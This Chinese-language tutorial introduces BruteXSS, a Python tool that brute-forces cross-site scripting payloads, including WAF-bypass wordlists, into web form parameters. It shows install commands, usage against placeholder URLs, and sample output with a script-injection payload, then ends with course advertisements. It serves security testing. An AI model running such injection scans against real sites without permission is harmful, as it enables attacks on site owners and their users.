相信很多小夥伴都知道XSS測試,至於如何更加有效地插入載荷是一件重複性的高強度勞動工作,在此本文介紹了一款自動進行插入XSS,並且可以自定義***載荷。這些載荷從幾十條到幾百條甚至幾千條。該腳本也同時包含了一些繞過各種WAF的語句。
0×01 BruteXSS
BruteXSS是一個非常強大和快速的跨站點腳本暴力注入。它用於暴力注入一個參數。該BruteXSS從指定的詞庫加載多種有效載荷進行注入並且使用指定的載荷和掃描檢查這些參數很容易受到XSS漏洞。得益於非常強大的掃描功能。在執行任務時, BruteXSS是非常準確而且極少誤報。 BruteXSS支持POST和GET請求,適應現代Web應用程序。
特點:
XSS暴力破解
XSS掃描
支持GET/ POST請求
自定義單詞可以包含
人性化的UI
0×02 下載與安裝
github地址:https://github.com/ym2011/penetration/tree/master/BruteXSS
安裝小提示:1 腳本需要以下條件方可正常執行:
Python 2.7 #在運行python 2.7的平臺上,如Windows , Linux 或者其他設備
Modules required: Colorama, Mechanize #所需模塊,請參考以下方式安裝
root@kali:~/Desktop/BruteXSS# pip install colorama
root@kali:~/Desktop/BruteXSS# pip install Mechanize
0×03 實際使用
安裝成功後,我們可以執行以下語句:
root@kali:~/Desktop/BruteXSS# python brutexss.py -h
#在目錄 BruteXSS 下,有wordlist.txt wordlist-small.txt wordlist-medium.txt wordlist-huge.txt四個***載荷
wordlist.txt # 約20條常用語句,可以執行一個基本簡單的XSS檢查
wordlist-small.txt #約100條語句,可以執行一個相對全面的XSS檢查
wordlist-medium.txt #約200條語句,可以執行一個繞過WAF的XSS檢查
wordlist-huge.tx #約5000條語句,可以執行一個非常全面的並且繞過WAF的XSS檢查
1 GET 方法
COMMAND: python brutexss.py
METHOD: g
URL: http://www.site.com/?parameter=value
WORDLIST: wordlist.txt
2 POST方法COMMAND: python brutexss.py
METHOD: p
URL: http://www.site.com/file.php
POST DATA: parameter=value¶meter1=value1
WORDLIST: wordlist.txt
3 結果輸出
____ _ __ ______ ____ | __ ) _ __ _ _| |_ ___ \ \/ / ___/ ___| | _ \| '__| | | | __/ _ \ \ /\___ \___ \ | |_) | | | |_| | || __/ / \ ___) |__) | |____/|_| \__,_|\__\___| /_/\_\____/____/ BruteXSS - Cross-Site Scripting BruteForcer Author: Shawar Khan - https://shawarkhan.com Select method: [G]ET or [P]OST (G/P): p[?] Enter URL: [?] > http://site.com/file.php [+] Checking if site.com is available... [+] site.com is available! Good! [?] Enter post data: > parameter=value¶meter1=value1 [?] Enter location of Wordlist (Press Enter to use default wordlist.txt) [?] > wordlist.txt [+] Using Default wordlist... [+] Loading Payloads from specified wordlist... [+] 25 Payloads loaded... [+] Injecting Payloads... [+] Testing 'parameter' parameter... [+] 2 / 25 payloads injected... [!] XSS Vulnerability Found! [!] Parameter: parameter [!] Payload: "><script>prompt(1)</script> [+] Testing 'parameter1' parameter... [+] 25 / 25 payloads injected... [+] 'parameter1' parameter not vulnerable. [+] 1 Parameter is vulnerable to XSS. +----+--------------+----------------+ | Id | Parameters | Status | +----+--------------+----------------+ | 0 | parameter | Vulnerable | +----+--------------+----------------+ | 1 | parameter1 | Not Vulnerable | +----+--------------+----------------+
以下是運行使用結果截圖:(哈哈,安全維基小廣告 https://www.sec-wiki.com/ ***^^___^^*****)
歡迎大夥分享更好的思路,熱切期待^^_^^ !
只要是註冊http://edu.aqniu.com/ 可以免費選擇三門課程想要註冊後加Q羣131068813備註註冊id就可以獲得權限免費學習